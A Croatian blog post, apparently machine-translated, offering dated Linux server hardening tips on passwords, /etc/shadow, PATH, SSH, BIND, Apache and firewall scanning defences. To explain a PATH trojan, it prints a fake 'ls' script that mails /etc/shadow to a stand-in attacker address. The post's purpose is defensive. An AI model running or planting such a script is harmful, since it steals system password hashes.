Već dugo nisam ništa objavio na blogu i volio bih podijeliti nekoliko savjeta preuzetih iz knjige koja (između ostalih). Pronašao sam ga na Sveučilištu i upravo sam pročitao i premda je iskreno pomalo zastario i vrlo je vjerojatno da će prikazane tehnike funkcionirati s obzirom na evoluciju sustava, također su zanimljivi aspekti koji se mogu pokazati.
Želim pojasniti da su to savjeti orijentirani na Linux sustav koji se koristi kao poslužitelj, u srednjem ili možda velikom opsegu, jer na razini korisnika radne površine, iako se mogu primijeniti, ne bi bili od velike koristi.
Također napominjem da su to jednostavni brzi savjeti i neću ulaziti u detalje, iako planiram napraviti još jedan puno konkretniji i opsežniji post o određenoj temi. Ali to ću vidjeti kasnije. Započnimo.
Pravila o zaporkama.
Iako zvuči kao krilatica, dobra politika zaporke čini razliku između ranjivog sustava ili ne. Napadi poput "grube sile" koriste lošu lozinku za pristup sustavu. Najčešći savjeti su:
- Kombinirajte velika i mala slova.
- Koristite posebne znakove.
- Brojevi.
- Više od 6 znamenki (nadamo se i više od 8).
Uz ovo, razmotrimo dvije bitne datoteke. / etc / passwd i / etc / shadow.
Nešto vrlo važno je da datoteka / etc / passwd. Pored toga što nam daje ime korisnika, njegov uid, put do mape, bash .. itd. u nekim slučajevima prikazuje i šifrirani ključ korisnika.
Pogledajmo njegov tipični sastav.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
korisnik: cryptkey: uid: gid: put :: put: bash
Pravi je problem ovdje što ta datoteka ima dozvole -rw-r - r– što znači da ima dozvole za čitanje za bilo kojeg korisnika u sustavu. a imati šifrirani ključ nije jako teško dešifrirati pravi.
Zbog toga datoteka postoji / etc / shadow. Ovo je datoteka u kojoj su, između ostalog, pohranjeni svi korisnički ključevi. Ova datoteka ima potrebna dopuštenja tako da je nijedan korisnik ne može pročitati.
Da bismo to onda popravili, moramo otići do datoteke / Etc / passwd i promijenite šifrirani ključ u "x", to će samo sačuvati ključ u našoj datoteci / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problemi s PATH-om i .bashrc-om i drugima.
Kad korisnik izvrši naredbu na svojoj konzoli, ljuska traži tu naredbu na popisu direktorija sadržanih u varijabli okruženja PATH.
Ako u konzolu upišete "echo $ PATH", dobit će se otprilike ovako.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
U svakoj od ovih mapa ljuska će tražiti naredbu napisanu za njezino izvršavanje. On "." to znači da je prva mapa za pretraživanje ista mapa iz koje se izvršava naredba.
Pretpostavimo da postoji korisnik "Carlos" i da taj korisnik želi "činiti zlo". Ovaj korisnik može ostaviti datoteku pod nazivom "ls" u svojoj glavnoj mapi i u ovoj datoteci izvršiti naredbu poput:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
A ako korijenski korisnik za odredišne stvari pokuša navesti mape unutar mape carlos (jer prvo traži naredbu u istoj mapi, nehotice bi datoteku s lozinkama poslao na ovu e-poštu, a zatim mape bi bio na popisu i saznao bi to vrlo kasno.
Da bismo to izbjegli moramo ukloniti "." varijable PATH.
Na isti način, datoteke poput /.bashrc, /.bashrc_profile, ./.login trebaju se revidirati i provjeriti da ne postoji "." u varijabli PATH, a zapravo iz datoteka poput ove možete promijeniti odredište određene naredbe.
Savjeti za usluge:
Ššš
- Onemogućite verziju 1 ssh protokola u datoteci sshd_config.
- Ne dopusti root korisniku da se prijavi ssh-om.
- Datoteke i mape ssh_host_key, ssh_host_dsa_key i ssh_host_rsa_key treba čitati samo root korisnik.
VEZATI
- Promijenite poruku dobrodošlice u datoteci named.conf tako da ne prikazuje broj verzije
- Transferi s ograničenom zonom i omogućite ih samo timovima kojima je potreban.
apaš
- Spriječite da usluga prikazuje vašu verziju u poruci dobrodošlice. Uredite datoteku httpd.conf i dodajte ili izmijenite redove:
ServerSignature Off
ServerTokens Prod
- Onemogući automatsko indeksiranje
- Konfigurirajte apache da ne poslužuje osjetljive datoteke poput .htacces, * .inc, * .jsp .. itd
- Uklonite stranice s podacima ili uzorak iz usluge
- Pokrenite apache u chrootiranom okruženju
Sigurnost mreže.
Nužno je pokriti sve moguće unose u vaš sustav s vanjske mreže, evo nekoliko bitnih savjeta kako spriječiti uljeze da skeniraju i dobiju informacije s vaše mreže.
Blokirajte ICMP promet
Vatrozid mora biti konfiguriran za blokiranje svih vrsta dolaznog i odlaznog ICMP prometa i eho odgovora. Ovim izbjegavate da vas, primjerice, pronađe skener koji traži opremu pod naponom u IP opsegu.
Izbjegavajte TCP skeniranje pinga.
Jedan od načina skeniranja vašeg sustava je TCP ping skeniranje. Pretpostavimo da se na vašem poslužitelju nalazi Apache poslužitelj na priključku 80. Uljez bi mogao poslati ACK zahtjev na taj priključak, s tim će, ako sustav odgovori, računalo biti živo i skenirat će ostale priključke.
Zbog toga bi vaš vatrozid uvijek trebao imati opciju "svijest o stanju" i odbaciti sve ACK pakete koji ne odgovaraju već uspostavljenoj TCP vezi ili sesiji.
Nekoliko dodatnih savjeta:
- Upotrijebite IDS sustave za otkrivanje skeniranja priključaka na vašoj mreži.
- Konfigurirajte vatrozid tako da ne vjeruje postavkama priključka izvora veze.
To je zato što neka skeniranja koriste "lažni" izvorni port poput 20 ili 53, budući da mnogi sustavi vjeruju tim priključcima jer su tipični za ftp ili DNS.
NAPOMENA: Imajte na umu da je većina problema navedenih u ovom postu već riješena u gotovo svim trenutnim distribucijama. Ali nikad ne škodi imati ključne informacije o tim neugodnostima kako vam se ne bi dogodile.
NAPOMENA: Kasnije ću vidjeti određenu temu i objavit ću post s puno detaljnijim i aktualnijim informacijama.
Zahvaljujem svima na čitanju.
Pozdrav.
Članak mi se jako svidio i zanima me tema, potičem vas da nastavite prenositi sadržaj.